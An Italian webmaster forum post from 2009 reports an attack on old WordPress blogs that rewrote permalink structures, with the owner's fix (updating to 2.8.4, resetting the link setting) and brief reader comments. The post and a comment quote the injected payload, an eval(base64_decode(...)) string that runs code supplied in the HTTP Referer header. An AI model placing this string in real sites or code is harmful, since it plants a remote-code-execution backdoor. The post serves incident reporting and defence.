msgbartop
La Repubblica dei Webmaster Italiani
msgbarbottom


04 set 09 - Attacco a siti WordPress, cambio URL articoli blog.

Scritto da: admin - Letto 6.696 Volte

Ciao a tutti,

stamattina mi sono accorto che su un mio blog versione 2.7.1 erano state cambiare le url degli articoli, invece del solito URL tipo http://www.sito.it/blog/5855/nome-articolo/ avevo http://www.sito.it/blog/5855/nome-articolo/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

in pratica sfruttando “credo” qualche bug di WP, hanno cambiato la struttura personalizzata dei link aggiungendo a /%post_id%/%postname%/ (struttura che uso io di norma) il codice %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/ .

Ho fatto una breve ricerca su Google, e sono tantissimi i Blog già compromessi, la maggior parte sono versioni 2.7 e 2.7.1, ma ho visto anche qualche 2.8 e una 2.8.4 (non vorrei pero che l’aggiornamento sia stato fatto dopo)…

Intanto io ho aggiornato alla 2.8.4  e corretto la struttura personalizzata dei link ,  (basta andare in Impostazioni –> Permanent Links), spero che basti.

Speriamo di capirci un po di piu… in giro ancora non c’è niente di ufficiale..

Se avete News , commentate…

Un soluzione completa per chi mastica un pò di inglese c’è qui http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/ .

Reader's Comments

  1. |

    Attacco a siti WordPress, cambio URL articoli blog con codice EVAL…

    Da ieri è in corso un attacco alle installazione WordPress, che modifica le url dei blog , aggiungendo negli indirizzi degli articoli il codice %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)…

  2. |

    Quando si usa un core come ad esempio WP si deve sempre aggiornare la versione all’ultima esistente nel minor tempo possibile in quanto altrimenti si diventa facili prede di lammer. Una volta uscita la nuova relase è un gioco da ragazzi trovare il bug che và a correggere e quindi è un istante attaccarlo.

  3. |

    Mi piace quell’ articolo, non avrei pensato che questo è practicabile

  4. |

    Veramente un bell’articolo. Consiglio a tutti di leggerlo!

Leave a Comment